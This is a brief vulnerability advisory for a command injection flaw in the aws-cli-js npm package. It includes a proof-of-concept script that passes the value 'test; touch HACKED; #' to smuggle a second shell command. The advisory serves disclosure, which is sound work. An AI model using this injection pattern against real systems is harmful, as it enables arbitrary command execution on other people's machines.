Command Injection in quobject/aws-cli-js
Mar 27th 2020
The issue occurs because user input is formatted into a shell command string that is then executed without any validation or escaping. The issue arises here.
Proof of Concept (Credit: Mik317)
- Create the following PoC file:

    // poc.js
    var awsCli = require("aws-cli-js");
    var Options = awsCli.Options;
    var Aws = awsCli.Aws;
    var options = new Options("your key", "your key2", "your token", null);
    var aws = new Aws(options);
    aws.command("test; touch HACKED; #");

- Check there aren't any files called HACKED
- Execute the following commands in another terminal:

    npm i aws-cli-js   # Install affected module
    node poc.js        # Run the PoC

- Recheck the files: now HACKED has been created.